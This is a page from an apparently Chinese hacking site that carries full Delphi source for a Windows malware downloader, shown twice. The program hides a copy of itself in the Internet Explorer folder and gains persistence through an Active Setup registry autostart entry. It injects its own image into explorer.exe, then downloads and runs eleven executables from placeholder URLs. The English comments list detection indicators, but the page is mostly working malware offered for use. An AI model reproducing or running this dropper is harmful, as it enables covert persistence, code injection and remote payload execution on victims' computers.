
[Delphi文章] ActiveX启动下载者 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全


program InjectTheSelf;  
 
// Fixed preferred image base.  Inject() below copies this process's own image into the
// target process at the very address it occupies here (VirtualAllocEx is called with
// Module as the requested base), so the image needs a predictable load address;
// presumably that is why it is pinned rather than left to the linker default.
{$IMAGEBASE $13140000} 
 
uses 
Windows;  
 
var 
// ShellExecuteA, resolved from shell32.dll at runtime inside Download  
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;  
// URLDownloadToFileA; Download resolves it from 'unlmon.dll', the renamed copy of
// urlmon.dll that the main block creates, not from urlmon.dll itself  
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;  
// module handles filled in by Download; never freed  
hShell,hUrlmon: THandle;  
 
 
//插入IE需要用到的函数  
// Resolves the full path of iexplore.exe for the IE host used by RunInject.
// Reads the (Default) value of the App Paths\IEXPLORE.EXE key under HKLM and returns it;
// if the query fails, a literal fallback path is returned instead.
// The RegOpenKeyEx result is ignored, so on a failed open iekey is left undefined and the
// query presumably fails, which lands on the fallback branch.
function GetIEAppPath:string;  
var 
iekey: Hkey;  
iename: array [0..255] of char;  // receives the registry string, returned as Result  
vType,dLength :DWORD;  
begin 
vType := REG_SZ;  
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);  
dLength := SizeOf(iename);  
// '' selects the key's (Default) value, which App Paths uses for the executable path  
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then 
Result := iename  
else 
// fallback path; the %programfiles% variable is not expanded by this function  
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';  
RegCloseKey(iekey);  
end;  
//写注册表 用到的函数 为activeX启动准备  
// Creates (or opens) key\subkey and writes name = value as a REG_EXPAND_SZ string.
// Returns True only when RegSetValueEx reports success; the RegCreateKey result is not checked.
// The main block uses this to plant an Active Setup "Installed Components" StubPath, which is
// the autostart mechanism the page title refers to.  A write to that key path by an
// unexpected process is a useful detection point.
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;  
var 
regkey:hkey;  
begin 
result := false;  
RegCreateKey(key,PChar(subkey),regkey);  
// writes length(value) bytes of the string as expandable-string data  
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then 
result := true;  
RegCloseKey(regkey);  
 
end;  
 
//插入media player用到的函数  
// Resolves the full path of wmplayer.exe for the Media Player host used by RunInject (InjType=3).
// Same pattern as GetIEAppPath: reads the (Default) value of the App Paths\wmplayer.EXE key
// under HKLM, ignoring the RegOpenKeyEx result, and falls back to a literal path when the
// query fails.
function GetwmAppPath:string;  
var 
wmkey: Hkey;  
iename: array [0..255] of char;  // receives the registry string, returned as Result  
vType,dLength :DWORD;  
begin 
 
vType := REG_SZ;  
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);  
dLength := SizeOf(iename);  
// '' selects the key's (Default) value  
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then 
Result := iename  
else 
// fallback path; %programfiles% is not expanded here  
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';  
RegCloseKey(wmkey);  
end;  
 
// Payload routine.  RunInject passes its address to Inject, which starts it as a remote
// thread inside the host process, so everything below runs in that process's context.
// It resolves ShellExecuteA and URLDownloadToFileA by name, then for each hard-coded URL
// (placeholders in this listing) downloads to a fixed C:\WINDOWS\Temp\systemN.exe path and
// launches that file, and finally calls ExitProcess, which terminates the host process.
// No return value (LoadLibrary, GetProcAddress, Downfile, ShellRun) is ever checked, so a
// failed download is still followed by the launch attempt.
// For defenders, the fixed drop paths under C:\WINDOWS\Temp and the load of 'unlmon.dll'
// are the observable artefacts of this routine.
procedure Download; // download routine  
begin 
LoadLibrary('kernel32.dll');  
LoadLibrary('user32.dll');  
hShell:=LoadLibrary('Shell32.dll');  
// loads the copy of urlmon.dll that the main block created under this alternate name  
hUrlmon:=LoadLibrary('unlmon.dll');  
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');  
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');  
// each pair: fetch the URL to a fixed temp path, then ShellExecute "open" on it (ShowCmd 5 = SW_SHOW)  
Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5);  
 
Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5);  
 
Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5);  
 
Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5);  
 
Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);  
 
Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5);  
 
Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);  
 
Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5);  
 
Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5);  
 
Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5);  
 
Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5);  
 
 
// terminates the process this thread was injected into (explorer.exe for InjType=0)  
ExitProcess(0);  
end;  
 
// Self-image injection: copies this process's entire mapped image (starting at its own
// base, GetModuleHandle(nil)) into ProcessHandle at the same address, then starts a remote
// thread there at EntryPoint with Module as the thread parameter.  The identical base is
// required because the copied bytes are not relocated; see the {$IMAGEBASE} directive.
// None of the API results are checked.  For defenders, the sequence VirtualFreeEx ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> CreateRemoteThread
// against another process is the behavioural signature of this routine.
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);  
var 
Module, NewModule: Pointer;  
Size, BytesWritten, TID: longword;  
begin 
// base address of this process's own image  
Module := Pointer(GetModuleHandle(nil));  
// SizeOfImage from the optional header, reached via e_lfanew + PE signature + file header  
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +  
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;  
// release whatever the target has mapped at that address so it can be re-allocated  
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);  
// reserve and commit Size bytes in the target at the same base, readable/writable/executable  
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);  
// copy the whole image across  
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);  
// start a remote thread at EntryPoint; the injection is complete at this point  
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);   
end;  
 
// Selects a host process by InjType, opens it with PROCESS_ALL_ACCESS and injects
// Download into it via Inject.
//   0           : explorer.exe, located through its 'Shell_TrayWnd' taskbar window
//   3           : wmplayer.exe, started hidden first, located through 'WMPlayerApp'
//   anything else: iexplore.exe, started hidden first, located through 'IEFrame'
// Nothing is checked: if FindWindow returns 0 the PID local is simply not filled in,
// and a failed OpenProcess still reaches Inject.
procedure RunInject(InjType:integer);  
var 
ProcessHandle, PID: longword;  
 
begin 
if InjType=0 then // inject into explorer.exe  
begin 
// PID of the process owning the taskbar window  
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);  
end 
else 
if InjType=3 then // inject into Media Player  
begin 
winexec(PChar(GetwmAppPath),sw_hide);  
sleep(500);  // give the new process time to create its window  
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);  
end 
else // inject into iexplore.exe  
begin 
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);  
winexec(PChar(GetIEAppPath),sw_hide);  
sleep(500);  // give the new process time to create its window  
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);  
end;  
// open the host process with full access  
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);  
Inject(ProcessHandle, @Download);  
// release the handle  
CloseHandle(ProcessHandle);  
end;  
 
 
BEGIN  
// Setup performed by the dropper itself before injection:
//  1. copies urlmon.dll to a second name, unlmon.dll, which Download later loads;
//  2. copies its own executable (paramstr(0)) to the Internet Explorer folder as iede.exe
//     and marks it hidden+system;
//  3. registers iede.exe as the StubPath of an Active Setup "Installed Components" entry
//     under HKLM, the autostart mechanism the page title refers to;
//  4. injects Download into explorer.exe (RunInject(0)).
// Both CopyFile calls pass bFailIfExists=True, so existing files are not overwritten, and
// no result is checked.  The targets (system32, Program Files, HKLM) require elevated
// rights.  For defenders, unlmon.dll, iede.exe and the GUID subkey below are the
// host-based indicators left by this block.
 
CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;  
copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);  
SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',  
FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );// mark the dropped copy hidden+system  
// Active Setup autostart entry  
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');  
RunInject(0); // InjType selects the host: 1 = iexplore.exe, 0 = explorer.exe, 3 = Media Player  
end. 

program InjectTheSelf;

// Fixed preferred image base.  Inject() below copies this process's own image into the
// target process at the very address it occupies here (VirtualAllocEx is called with
// Module as the requested base), so the image needs a predictable load address;
// presumably that is why it is pinned rather than left to the linker default.
{$IMAGEBASE $13140000}

uses
Windows;

var
// ShellExecuteA, resolved from shell32.dll at runtime inside Download
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
// URLDownloadToFileA; Download resolves it from 'unlmon.dll', the renamed copy of
// urlmon.dll that the main block creates, not from urlmon.dll itself
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
// module handles filled in by Download; never freed
hShell,hUrlmon: THandle;


//插入IE需要用到的函数
// Resolves the full path of iexplore.exe for the IE host used by RunInject.
// Reads the (Default) value of the App Paths\IEXPLORE.EXE key under HKLM and returns it;
// if the query fails, a literal fallback path is returned instead.
// The RegOpenKeyEx result is ignored, so on a failed open iekey is left undefined and the
// query presumably fails, which lands on the fallback branch.
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;  // receives the registry string, returned as Result
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
// '' selects the key's (Default) value, which App Paths uses for the executable path
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
// fallback path; the %programfiles% variable is not expanded by this function
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
//写注册表 用到的函数 为activeX启动准备
// Creates (or opens) key\subkey and writes name = value as a REG_EXPAND_SZ string.
// Returns True only when RegSetValueEx reports success; the RegCreateKey result is not checked.
// The main block uses this to plant an Active Setup "Installed Components" StubPath, which is
// the autostart mechanism the page title refers to.  A write to that key path by an
// unexpected process is a useful detection point.
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
// writes length(value) bytes of the string as expandable-string data
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);

end;

//插入media player用到的函数
// Resolves the full path of wmplayer.exe for the Media Player host used by RunInject (InjType=3).
// Same pattern as GetIEAppPath: reads the (Default) value of the App Paths\wmplayer.EXE key
// under HKLM, ignoring the RegOpenKeyEx result, and falls back to a literal path when the
// query fails.
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;  // receives the registry string, returned as Result
vType,dLength :DWORD;
begin

vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
dLength := SizeOf(iename);
// '' selects the key's (Default) value
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
// fallback path; %programfiles% is not expanded here
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';
RegCloseKey(wmkey);
end;

// Payload routine.  RunInject passes its address to Inject, which starts it as a remote
// thread inside the host process, so everything below runs in that process's context.
// It resolves ShellExecuteA and URLDownloadToFileA by name, then for each hard-coded URL
// (placeholders in this listing) downloads to a fixed C:\WINDOWS\Temp\systemN.exe path and
// launches that file, and finally calls ExitProcess, which terminates the host process.
// No return value (LoadLibrary, GetProcAddress, Downfile, ShellRun) is ever checked, so a
// failed download is still followed by the launch attempt.
// For defenders, the fixed drop paths under C:\WINDOWS\Temp and the load of 'unlmon.dll'
// are the observable artefacts of this routine.
procedure Download; // download routine
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
// loads the copy of urlmon.dll that the main block created under this alternate name
hUrlmon:=LoadLibrary('unlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
// each pair: fetch the URL to a fixed temp path, then ShellExecute "open" on it (ShowCmd 5 = SW_SHOW)
Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5);

Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5);

Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5);

Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5);

Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5);

Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5);

Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5);

Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5);

Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5);


// terminates the process this thread was injected into (explorer.exe for InjType=0)
ExitProcess(0);
end;

// Self-image injection: copies this process's entire mapped image (starting at its own
// base, GetModuleHandle(nil)) into ProcessHandle at the same address, then starts a remote
// thread there at EntryPoint with Module as the thread parameter.  The identical base is
// required because the copied bytes are not relocated; see the {$IMAGEBASE} directive.
// None of the API results are checked.  For defenders, the sequence VirtualFreeEx ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> CreateRemoteThread
// against another process is the behavioural signature of this routine.
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
// base address of this process's own image
Module := Pointer(GetModuleHandle(nil));
// SizeOfImage from the optional header, reached via e_lfanew + PE signature + file header
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
// release whatever the target has mapped at that address so it can be re-allocated
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
// reserve and commit Size bytes in the target at the same base, readable/writable/executable
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// copy the whole image across
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
// start a remote thread at EntryPoint; the injection is complete at this point
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

// Selects a host process by InjType, opens it with PROCESS_ALL_ACCESS and injects
// Download into it via Inject.
//   0           : explorer.exe, located through its 'Shell_TrayWnd' taskbar window
//   3           : wmplayer.exe, started hidden first, located through 'WMPlayerApp'
//   anything else: iexplore.exe, started hidden first, located through 'IEFrame'
// Nothing is checked: if FindWindow returns 0 the PID local is simply not filled in,
// and a failed OpenProcess still reaches Inject.
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;

begin
if InjType=0 then // inject into explorer.exe
begin
// PID of the process owning the taskbar window
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else
if InjType=3 then // inject into Media Player
begin
winexec(PChar(GetwmAppPath),sw_hide);
sleep(500);  // give the new process time to create its window
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
end
else // inject into iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);  // give the new process time to create its window
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
// open the host process with full access
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
// release the handle
CloseHandle(ProcessHandle);
end;


BEGIN
// Setup performed by the dropper itself before injection:
//  1. copies urlmon.dll to a second name, unlmon.dll, which Download later loads;
//  2. copies its own executable (paramstr(0)) to the Internet Explorer folder as iede.exe
//     and marks it hidden+system;
//  3. registers iede.exe as the StubPath of an Active Setup "Installed Components" entry
//     under HKLM, the autostart mechanism the page title refers to;
//  4. injects Download into explorer.exe (RunInject(0)).
// Both CopyFile calls pass bFailIfExists=True, so existing files are not overwritten, and
// no result is checked.  The targets (system32, Program Files, HKLM) require elevated
// rights.  For defenders, unlmon.dll, iede.exe and the GUID subkey below are the
// host-based indicators left by this block.

CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;
copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);
SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',
FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );// mark the dropped copy hidden+system
// Active Setup autostart entry
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');
RunInject(0); // InjType selects the host: 1 = iexplore.exe, 0 = explorer.exe, 3 = Media Player
end.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
ActiveX 启动下载者